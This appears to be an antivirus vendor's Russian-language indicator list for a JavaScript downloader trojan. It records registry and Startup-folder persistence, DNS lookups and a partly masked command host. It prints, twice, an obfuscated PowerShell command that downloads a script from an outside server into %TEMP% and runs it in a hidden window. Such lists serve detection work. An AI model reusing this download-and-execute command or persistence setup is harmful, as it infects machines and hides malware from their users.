Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'GE1076BAR4' = '"%TEMP%\JavaUpdate.js"'
- %APPDATA%\microsoft\windows\start menu\programs\startup\javaupdate.js
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://system11.sslblindado.com/fud'',$env:temp+''\\''+''JavaUpdate.js'')'|D; sta...
- %TEMP%\javaupdate.js
- 'ja#####ate.hopto.org':200
- DNS ASK sy######.sslblindado.com
- DNS ASK ja#####ate.hopto.org
- '<SYSTEM32>\wscript.exe' "%TEMP%\JavaUpdate.js"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://system11.sslblindado.com/fud'',$env:temp+''\\''+''JavaUpdate.js'')'|D; sta...' (со скрытым окном)